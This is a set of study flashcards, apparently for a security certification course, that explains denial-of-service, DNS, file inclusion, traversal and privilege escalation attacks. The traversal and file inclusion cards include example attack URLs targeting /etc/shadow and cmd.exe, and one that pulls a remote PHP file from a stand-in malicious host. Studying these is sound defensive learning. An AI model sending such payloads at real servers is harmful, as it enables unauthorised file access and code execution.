Malicious activity Flashcards
What are few Denial Of service attacks?
- SYN flood
- Amplified DNS attack
- Ping flood
- PDOS (Permanent Denial Of Service)
- Fork Bomb - in this attack, a process replicates into multiple processes within a memory and taking up all the memory resource of a system until it crashes. Fork refers to a process here.
- DDOS attack -
What are few prevention measures against DDOS attacks?
- Implement IPS (Intrusion prevention System)
- Black-hole/sinkhole
- Elastic Cloud Infrastructure
What is DNS cache poisoning attack?
In this attack, a threat actor inserts malicious DNS entries (Domains pointing to Malicious IPs) into DNS resolver.
Protection techniques -
- Use DNSSEC (DNS Security Extension) - In this technique, DNS responses that DNS resolved get from other DNS servers are sent with cryptographic signatures.
- Implement good security measures for protecting DNS resolver.
What is DNS amplification attack?
In this attack, an attacker spoofs the IP of a victim and sends some command to DNS server requesting data.
DNS server/resolver responses back with large amount of DNS data that overwhelms the victim device.
What is DNS tunnelling attack?
In this attack, an attacker wraps some other protocol Data like HTTP, SSH inside the DNS data to cross through firewall rules.
They might do it to exfiltrate data or command control.
To protect from it, analyze DNS log data.
What is Domain Hijacking attack?
It is an attack in which an attacker takes over someone’s else domain.
They might to deface the domain or to infect users who visit this site.
To protect from it, we should protect registration account information.
What is DNS Zone transfer attack?
In this attack, an threat actor mimics an authorized system to request and obtain the entire DNS Zone data for a domain.
This kind of attack can expose sensitive data about a network like their network architecture.
What is a directory Traversal attack?
In this attack, a threat actor is able to access unauthorized files /folder/commands either in the Web-document root directory or in some other folder on the same server that has Web-document root directory.
Here is an example of directory traversal -
https://diontraining.com/../../../etc/shadow
What is an inclusion attack?
Inclusion attack - In this attack, a threat actor is able to include some file in the application and eventually get the application to run this malicious file.
Example - threat actor might include a file into a web application and run this malicious file on the server which might lead to data theft, unexpected actions taking place on server or run some arbitrary code on the server.
It is of 2 types -
- Remote File inclusion -
2.Loacl File inclusion
What is remote file inclusion attack?
In this attack, a threat actor finds a file inclusion vulnerability in an application and is able to include a remote file into an application (Most often a web-application).
Once file is included, web-server application might runs this malicious file.
Example -
https://diontraining.com/login.php?user=http://malware.bad/malicious.php
What is local file inclusion?
In this malicious activity or attack, a threat actor tries to include a file that already exists on the server host.
How can a file already be existing on the web-server?
- the webpage might have some online form that accepts file and attacker might be have to upload a malicious file into the server host.
So in this attack, a threat actor attempts to make the web-server application run this locally-included file.
Normally this includes Directory Traversal -
Example -
https//:diontraining.com/login.php?user=../../windows/system32/cmd.exe%00
What is an arbitrary code execution attack?
This attack takes place when an attacker is able to run any malicious code/command of his own choice on the target system.
How does an attacker do it -
They exploit some vulnerability in the web application/system or network such a buffer Overflow, Injection attacks, File inclusion attacks etc.
If this malicious code is executed remotely, it is know as remote arbitrary code execution.
What is an privilege escalation attack?
This is an attack in which an attacker is able to escalate his privileges to a system resource. Example - gaining write permission instead of having only read permissions.
2 types -
Vertical privilege escalation - Like increasing permission levels from user account to admin account.
Horizontal privilege escalation - Like switching from 1st account permissions to seconds where both are user accounts but 2 account has access to a certain file or resource in the system.
What are 2 main kinds of root-kits?
Kernel Level rootkit and
User mode root kit
How can we protect from File Inclusion attacks?
- Sanitize user input
- Perform user input validation
- Implement proper access controls for every account including Web service account (for the users who is accessing the web-server)